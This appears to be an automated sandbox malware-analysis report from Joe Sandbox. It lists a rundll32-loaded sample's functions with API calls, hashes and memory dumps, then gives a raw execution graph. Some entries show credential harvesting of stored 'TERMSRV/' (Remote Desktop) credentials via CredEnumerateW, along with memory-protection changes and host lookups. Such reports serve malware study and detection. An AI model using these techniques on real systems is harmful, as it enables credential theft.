                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$Free$Alloc$CriticalInitializeSection
                                                • String ID:
                                                • API String ID: 2628759760-0
                                                • Opcode ID: c98e684c683cf875d122c3a13c1e6a1459fd872fe268cd57b67ea64a8ab56360
                                                • Instruction ID: 219972b7b89a501713f5c2512387df146b40a3f8dece0e2228bef0df92559d4d
                                                • Opcode Fuzzy Hash: c98e684c683cf875d122c3a13c1e6a1459fd872fe268cd57b67ea64a8ab56360
                                                • Instruction Fuzzy Hash: 9A014B71A907245BD3249F6AD840A1BF7E8FF48750F40491DFA49C7240CB70E850CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5407B Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 7
                                                • API String ID: 0-1790921346
                                                • Opcode ID: c15631bbab9ba9f037c616653b392078372c531c3707cb2e2bbad0faa19ad7ab
                                                • Instruction ID: 465e98aec9e57f3241607914c655cab9ddd419be001acdb468caff0e0c8ab26d
                                                • Opcode Fuzzy Hash: c15631bbab9ba9f037c616653b392078372c531c3707cb2e2bbad0faa19ad7ab
                                                • Instruction Fuzzy Hash: 16716C7195022AEBDF109F90CC81AFE7B76FF08344F109125FE14A6190E7749AA1EFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E529CE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E51000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,02E5271B,00000062,0000FEFF,?,02CE5020,000001BD), ref: 02E51008
                                                  • Part of subcall function 02E51000: HeapAlloc.KERNEL32(00000000,?,02E5271B,00000062,0000FEFF,?,02CE5020,000001BD), ref: 02E5100F
                                                • memcpy.MSVCRT ref: 02E529F4
                                                • memcpy.MSVCRT ref: 02E52A42
                                                • memcpy.MSVCRT ref: 02E52AD5
                                                Strings
                                                • u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu, xrefs: 02E529EE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memcpy$Heap$AllocProcess
                                                • String ID: u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu
                                                • API String ID: 3823808316-1507544218
                                                • Opcode ID: 3b6097f310ba6d4368bf4d2a8f20a6f4753059d017760a0206d8524957213ec6
                                                • Instruction ID: 917550086ddef9537904b4722760b688d9e0cfa033e69fc5ba010a8c96489570
                                                • Opcode Fuzzy Hash: 3b6097f310ba6d4368bf4d2a8f20a6f4753059d017760a0206d8524957213ec6
                                                • Instruction Fuzzy Hash: 5031C6729A0725AAEF21ABA49C05BAF37A6EF04750F10E425FF04BB281E7719D04CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E59590 Relevance: 6.1, APIs: 4, Instructions: 89memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,02E57E14,?,?,?), ref: 02E595CC
                                                • memcpy.MSVCRT ref: 02E595E5
                                                • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 02E59654
                                                • VirtualFree.KERNEL32(00000000,?,00004000), ref: 02E59674
                                                  • Part of subcall function 02E59286: VirtualProtect.KERNEL32(?,?,00000002,?,00000000), ref: 02E592A3
                                                  • Part of subcall function 02E59286: VirtualProtect.KERNEL32(00000000,?,00000002,?,02CE5020), ref: 02E59301
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Virtual$Protect$AllocFreememcpy
                                                • String ID:
                                                • API String ID: 2644210-0
                                                • Opcode ID: 6a9d6ad95bac1a2acd7245e39d5327f81130e9c3ecbd126a5abbd3e1892f124f
                                                • Instruction ID: 085ab7e5098ff4b46b47930d9c9731f93a94ccd2a18c8449af00bcd6eee7def1
                                                • Opcode Fuzzy Hash: 6a9d6ad95bac1a2acd7245e39d5327f81130e9c3ecbd126a5abbd3e1892f124f
                                                • Instruction Fuzzy Hash: D721E7716E0371EBCB208B66DC48F9B77D9AB45698F04A518FD06D3242D7B0D8548BF4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57B31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 02E57B4A
                                                • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 02E57C02
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Cred$EnumerateFree
                                                • String ID: TERMSRV/
                                                • API String ID: 3403564193-3001602198
                                                • Opcode ID: 4682d42cc4522139ac92b3ff9421caae9a4fff32d28262eb57f6c9a9dd9a68db
                                                • Instruction ID: aea31cdc397d8bd95dd6d98b262a6b98794c9639cd2037e49966c0afa778da30
                                                • Opcode Fuzzy Hash: 4682d42cc4522139ac92b3ff9421caae9a4fff32d28262eb57f6c9a9dd9a68db
                                                • Instruction Fuzzy Hash: 02219E72A60129DFCB54DFA4C8D48AEF7BAFB44318B65D46AD902A7210D3309A91CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57D6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000BB8,127.0.0.1,?,?,00000114), ref: 02E57DB7
                                                • PathFileExistsW.SHLWAPI(?,?), ref: 02E57DD4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePathSleep
                                                • String ID: 127.0.0.1
                                                • API String ID: 3601874461-3619153832
                                                • Opcode ID: a657da545908498cf69abf792bba46a578c96a31acf508d0be7f1ac16c5e728e
                                                • Instruction ID: 2d0f70634396202d65a658296f0b7dc3d8bd444681e32e11e25714b8787cb8a5
                                                • Opcode Fuzzy Hash: a657da545908498cf69abf792bba46a578c96a31acf508d0be7f1ac16c5e728e
                                                • Instruction Fuzzy Hash: F0F0F4316E02399BCB21AA65EC09EE7F358DB06788F489061AD02C6080DB71C5B4CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E59683 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: gethostbynamewsprintf
                                                • String ID: %u.%u.%u.%u
                                                • API String ID: 3411498959-1542503432
                                                • Opcode ID: d83cedb23c7a404512858c3c37d262aad474d3e66760e5f4889d4d14878f3e1e
                                                • Instruction ID: f72f460746174c4ad06ae083703c67854451d4fa689e8e20ebdb37d9718fb339
                                                • Opcode Fuzzy Hash: d83cedb23c7a404512858c3c37d262aad474d3e66760e5f4889d4d14878f3e1e
                                                • Instruction Fuzzy Hash: BEE02B712981706F83190B5ADC1CC72BFECDF092513098095F989CB122D624C520DBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56916 Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,00000000,00000000,74D65350,?,02E591A4,00000000), ref: 02E56935
                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02E591A4,00000000), ref: 02E56942
                                                • HeapAlloc.KERNEL32(00000000,?,02E591A4,00000000), ref: 02E56949
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,?,02E591A4,00000000), ref: 02E56961
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharHeapMultiWide$AllocProcess
                                                • String ID:
                                                • API String ID: 1432973188-0
                                                • Opcode ID: 1c1a9a0fb887aad5139475d3849a3a7a0481930399cc7d0745a87b0e0eede581
                                                • Instruction ID: 364717ceee5c5b14f5f2e91a4383f4db663445d550296674bd3b773614ac6cd0
                                                • Opcode Fuzzy Hash: 1c1a9a0fb887aad5139475d3849a3a7a0481930399cc7d0745a87b0e0eede581
                                                • Instruction Fuzzy Hash: 09F096B6A50228BFDB006EA49CC4C7F7B6DE7092687204635FD11E2280D6308D505B70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56CAA Relevance: 5.0, APIs: 4, Instructions: 31memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000), ref: 02E56CCC
                                                • HeapFree.KERNEL32(00000000), ref: 02E56CCF
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E56CDB
                                                • HeapFree.KERNEL32(00000000), ref: 02E56CDE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 6ad9e4a098a867a1b1306d449ed5581f8fd056eb18b83220c1a094022cfada03
                                                • Instruction ID: 8df1b860bb5c08637aa8154263c54ac406b5b3cdcf648a01afc53affdbd72e2d
                                                • Opcode Fuzzy Hash: 6ad9e4a098a867a1b1306d449ed5581f8fd056eb18b83220c1a094022cfada03
                                                • Instruction Fuzzy Hash: 84E0127279037867DA10AAD69DC0F57B7ACEB98655F444026EB04DB140CA60E8108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5711F Relevance: 5.0, APIs: 4, Instructions: 31memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,74DF0F00,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E5712E
                                                • HeapAlloc.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57131
                                                  • Part of subcall function 02E57167: EnterCriticalSection.KERNEL32(02CD5F60,74DEF380,?,02E5714E,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57178
                                                  • Part of subcall function 02E57167: LeaveCriticalSection.KERNEL32(02CD5F60,?,02E5714E,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E571B1
                                                  • Part of subcall function 02E57167: Sleep.KERNEL32(00002710,?,02E5714E,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E571C9
                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57156
                                                • HeapFree.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57159
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                                • String ID:
                                                • API String ID: 2739146912-0
                                                • Opcode ID: d566bb5c5b478cf8671988115e12085f8941d8a52af50096d8563d1670ee250c
                                                • Instruction ID: a81c8310489ac34c9044e1dc3b912127946bc7407600af645bf82ccbe14bbf35
                                                • Opcode Fuzzy Hash: d566bb5c5b478cf8671988115e12085f8941d8a52af50096d8563d1670ee250c
                                                • Instruction Fuzzy Hash: 00E030726903146BDB106EA69D84B17F79DEB54314F008425FA048A205CBB1D4248B30
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:17.3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.6%
                                                Total number of Nodes:1087
                                                Total number of Limit Nodes:34
                                                execution_graph 3593 7ff72e9045b4 3596 7ff72e906ad0 3593->3596 3597 7ff72e9045bd 3596->3597 3598 7ff72e906b02 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3596->3598 3598->3597 3599 7ff72e9028f4 3600 7ff72e901478 17 API calls 3599->3600 3601 7ff72e902957 3600->3601 3602 7ff72e9011dc 13 API calls 3601->3602 3609 7ff72e902a0b 3601->3609 3603 7ff72e902984 3602->3603 3604 7ff72e9011dc 13 API calls 3603->3604 3603->3609 3605 7ff72e9029b9 3604->3605 3605->3609 3610 7ff72e902a24 3605->3610 3608 7ff72e902a24 13 API calls 3608->3609 3611 7ff72e9011dc 13 API calls 3610->3611 3612 7ff72e902a66 3611->3612 3613 7ff72e9011dc 13 API calls 3612->3613 3616 7ff72e9029e2 3612->3616 3614 7ff72e902a8c 3613->3614 3615 7ff72e9011dc 13 API calls 3614->3615 3614->3616 3615->3616 3616->3608 3616->3609 3617 7ff72e905874 SetUnhandledExceptionFilter 3618 7ff72e905830 3619 7ff72e905869 3618->3619 3620 7ff72e90583f 3618->3620 3620->3619 3622 7ff72e908358 3620->3622 3627 7ff72e9052fc 3622->3627 3628 7ff72e905278 _getptd 62 API calls 3627->3628 3629 7ff72e905307 3628->3629 3630 7ff72e905317 3629->3630 3631 7ff72e905c24 _amsg_exit 62 API calls 3629->3631 3632 7ff72e90914c 3630->3632 3631->3630 3639 7ff72e9083bc DecodePointer 3632->3639 3640 7ff72e90927f 3641 7ff72e90929b 3640->3641 3642 7ff72e909291 3640->3642 3644 7ff72e90739c LeaveCriticalSection 3642->3644 3645 7ff72e9028ac 3646 7ff72e9028c5 3645->3646 3647 7ff72e9028bc LocalFree 3645->3647 3648 7ff72e9028d1 LocalFree 3646->3648 3649 7ff72e9028da 3646->3649 3647->3646 3648->3649 3650 7ff72e9028e6 FreeLibrary 3649->3650 3651 7ff72e9028ec 3649->3651 3650->3651 3661 7ff72e9021e8 RtlEqualUnicodeString 3662 7ff72e90221b __initmbctable 3661->3662 3663 7ff72e904de8 3664 7ff72e904df5 3663->3664 3665 7ff72e904dff 3663->3665 3667 7ff72e904c08 3664->3667 3668 7ff72e9052fc _getptd 62 API calls 3667->3668 3669 7ff72e904c2c 3668->3669 3691 7ff72e904844 3669->3691 3674 7ff72e907520 __wsetargv 62 API calls 3675 7ff72e904c58 __initmbctable 3674->3675 3685 7ff72e904d9b 3675->3685 3709 7ff72e904990 3675->3709 3678 7ff72e904c93 3680 7ff72e904cb7 3678->3680 3684 7ff72e9074e0 __free_lconv_num 62 API calls 3678->3684 3679 7ff72e904d9d 3681 7ff72e904db6 3679->3681 3682 7ff72e9074e0 __free_lconv_num 62 API calls 3679->3682 3679->3685 3680->3685 3686 7ff72e90749c _lock 62 API calls 3680->3686 3683 7ff72e905810 _errno 62 API calls 3681->3683 3682->3681 3683->3685 3684->3680 3685->3665 3688 7ff72e904ce7 3686->3688 3687 7ff72e904d8a 3719 7ff72e90739c LeaveCriticalSection 3687->3719 3688->3687 3690 7ff72e9074e0 __free_lconv_num 62 API calls 3688->3690 3690->3687 3692 7ff72e9052fc _getptd 62 API calls 3691->3692 3693 7ff72e904853 3692->3693 3694 7ff72e90486e 3693->3694 3695 7ff72e90749c _lock 62 API calls 3693->3695 3696 7ff72e9048f0 3694->3696 3698 7ff72e905c24 _amsg_exit 62 API calls 3694->3698 3699 7ff72e904881 3695->3699 3702 7ff72e904900 3696->3702 3698->3696 3700 7ff72e9048b7 3699->3700 3701 7ff72e9074e0 __free_lconv_num 62 API calls 3699->3701 3720 7ff72e90739c LeaveCriticalSection 3700->3720 3701->3700 3721 7ff72e9041a8 3702->3721 3705 7ff72e904945 3707 7ff72e90494a GetACP 3705->3707 3708 7ff72e904930 3705->3708 3706 7ff72e904920 GetOEMCP 3706->3708 3707->3708 3708->3674 3708->3685 3710 7ff72e904900 __initmbctable 64 API calls 3709->3710 3711 7ff72e9049b7 3710->3711 3712 7ff72e9049bf __initmbctable 3711->3712 3713 7ff72e904a10 IsValidCodePage 3711->3713 3718 7ff72e904a36 __initmbctable 3711->3718 3714 7ff72e907270 _amsg_exit 8 API calls 3712->3714 3713->3712 3715 7ff72e904a21 GetCPInfo 3713->3715 3716 7ff72e904bf1 3714->3716 3715->3712 3715->3718 3716->3678 3716->3679 3990 7ff72e904654 GetCPInfo 3718->3990 3722 7ff72e9041ba 3721->3722 3726 7ff72e90421b 3721->3726 3723 7ff72e9052fc _getptd 62 API calls 3722->3723 3725 7ff72e9041bf 3723->3725 3724 7ff72e9041f4 3724->3726 3728 7ff72e904844 __initmbctable 62 API calls 3724->3728 3725->3724 3729 7ff72e905114 3725->3729 3726->3705 3726->3706 3728->3726 3730 7ff72e9052fc _getptd 62 API calls 3729->3730 3731 7ff72e90511f 3730->3731 3732 7ff72e905148 3731->3732 3733 7ff72e90513a 3731->3733 3734 7ff72e90749c _lock 62 API calls 3732->3734 3735 7ff72e9052fc _getptd 62 API calls 3733->3735 3736 7ff72e905152 3734->3736 3738 7ff72e90513f 3735->3738 3743 7ff72e9050bc 3736->3743 3741 7ff72e905180 3738->3741 3742 7ff72e905c24 _amsg_exit 62 API calls 3738->3742 3741->3724 3742->3741 3744 7ff72e905106 3743->3744 3745 7ff72e9050ca _freefls _getptd 3743->3745 3747 7ff72e90739c LeaveCriticalSection 3744->3747 3745->3744 3748 7ff72e904f40 3745->3748 3749 7ff72e904f5e 3748->3749 3750 7ff72e904fd7 3748->3750 3749->3750 3753 7ff72e904f9d 3749->3753 3759 7ff72e9074e0 __free_lconv_num 62 API calls 3749->3759 3751 7ff72e9074e0 __free_lconv_num 62 API calls 3750->3751 3752 7ff72e90502a 3750->3752 3754 7ff72e904ffb 3751->3754 3760 7ff72e905057 3752->3760 3816 7ff72e9079f4 3752->3816 3757 7ff72e904fbf 3753->3757 3767 7ff72e9074e0 __free_lconv_num 62 API calls 3753->3767 3756 7ff72e9074e0 __free_lconv_num 62 API calls 3754->3756 3761 7ff72e90500f 3756->3761 3763 7ff72e9074e0 __free_lconv_num 62 API calls 3757->3763 3765 7ff72e904f91 3759->3765 3762 7ff72e9050a2 3760->3762 3772 7ff72e9074e0 62 API calls __free_lconv_num 3760->3772 3766 7ff72e9074e0 __free_lconv_num 62 API calls 3761->3766 3768 7ff72e904fcb 3763->3768 3764 7ff72e9074e0 __free_lconv_num 62 API calls 3764->3760 3776 7ff72e907e50 3765->3776 3770 7ff72e90501e 3766->3770 3771 7ff72e904fb3 3767->3771 3773 7ff72e9074e0 __free_lconv_num 62 API calls 3768->3773 3774 7ff72e9074e0 __free_lconv_num 62 API calls 3770->3774 3804 7ff72e907de4 3771->3804 3772->3760 3773->3750 3774->3752 3777 7ff72e907f54 3776->3777 3778 7ff72e907e59 3776->3778 3777->3753 3779 7ff72e907e73 3778->3779 3780 7ff72e9074e0 __free_lconv_num 62 API calls 3778->3780 3781 7ff72e907e85 3779->3781 3782 7ff72e9074e0 __free_lconv_num 62 API calls 3779->3782 3780->3779 3783 7ff72e907e97 3781->3783 3784 7ff72e9074e0 __free_lconv_num 62 API calls 3781->3784 3782->3781 3785 7ff72e907ea9 3783->3785 3786 7ff72e9074e0 __free_lconv_num 62 API calls 3783->3786 3784->3783 3787 7ff72e907ebb 3785->3787 3788 7ff72e9074e0 __free_lconv_num 62 API calls 3785->3788 3786->3785 3789 7ff72e907ecd 3787->3789 3790 7ff72e9074e0 __free_lconv_num 62 API calls 3787->3790 3788->3787 3791 7ff72e907edf 3789->3791 3792 7ff72e9074e0 __free_lconv_num 62 API calls 3789->3792 3790->3789 3793 7ff72e907ef1 3791->3793 3794 7ff72e9074e0 __free_lconv_num 62 API calls 3791->3794 3792->3791 3795 7ff72e907f03 3793->3795 3796 7ff72e9074e0 __free_lconv_num 62 API calls 3793->3796 3794->3793 3797 7ff72e907f15 3795->3797 3798 7ff72e9074e0 __free_lconv_num 62 API calls 3795->3798 3796->3795 3799 7ff72e907f2a 3797->3799 3801 7ff72e9074e0 __free_lconv_num 62 API calls 3797->3801 3798->3797 3800 7ff72e907f3f 3799->3800 3802 7ff72e9074e0 __free_lconv_num 62 API calls 3799->3802 3800->3777 3803 7ff72e9074e0 __free_lconv_num 62 API calls 3800->3803 3801->3799 3802->3800 3803->3777 3805 7ff72e907de9 3804->3805 3814 7ff72e907e4a 3804->3814 3806 7ff72e907e02 3805->3806 3807 7ff72e9074e0 __free_lconv_num 62 API calls 3805->3807 3808 7ff72e907e14 3806->3808 3809 7ff72e9074e0 __free_lconv_num 62 API calls 3806->3809 3807->3806 3810 7ff72e907e26 3808->3810 3812 7ff72e9074e0 __free_lconv_num 62 API calls 3808->3812 3809->3808 3811 7ff72e907e38 3810->3811 3813 7ff72e9074e0 __free_lconv_num 62 API calls 3810->3813 3811->3814 3815 7ff72e9074e0 __free_lconv_num 62 API calls 3811->3815 3812->3810 3813->3811 3814->3757 3815->3814 3817 7ff72e9079fd 3816->3817 3989 7ff72e90504b 3816->3989 3818 7ff72e9074e0 __free_lconv_num 62 API calls 3817->3818 3819 7ff72e907a0e 3818->3819 3820 7ff72e9074e0 __free_lconv_num 62 API calls 3819->3820 3821 7ff72e907a17 3820->3821 3822 7ff72e9074e0 __free_lconv_num 62 API calls 3821->3822 3823 7ff72e907a20 3822->3823 3824 7ff72e9074e0 __free_lconv_num 62 API calls 3823->3824 3825 7ff72e907a29 3824->3825 3826 7ff72e9074e0 __free_lconv_num 62 API calls 3825->3826 3827 7ff72e907a32 3826->3827 3828 7ff72e9074e0 __free_lconv_num 62 API calls 3827->3828 3829 7ff72e907a3b 3828->3829 3830 7ff72e9074e0 __free_lconv_num 62 API calls 3829->3830 3831 7ff72e907a43 3830->3831 3832 7ff72e9074e0 __free_lconv_num 62 API calls 3831->3832 3833 7ff72e907a4c 3832->3833 3834 7ff72e9074e0 __free_lconv_num 62 API calls 3833->3834 3835 7ff72e907a55 3834->3835 3836 7ff72e9074e0 __free_lconv_num 62 API calls 3835->3836 3837 7ff72e907a5e 3836->3837 3838 7ff72e9074e0 __free_lconv_num 62 API calls 3837->3838 3839 7ff72e907a67 3838->3839 3840 7ff72e9074e0 __free_lconv_num 62 API calls 3839->3840 3841 7ff72e907a70 3840->3841 3842 7ff72e9074e0 __free_lconv_num 62 API calls 3841->3842 3843 7ff72e907a79 3842->3843 3844 7ff72e9074e0 __free_lconv_num 62 API calls 3843->3844 3845 7ff72e907a82 3844->3845 3846 7ff72e9074e0 __free_lconv_num 62 API calls 3845->3846 3847 7ff72e907a8b 3846->3847 3848 7ff72e9074e0 __free_lconv_num 62 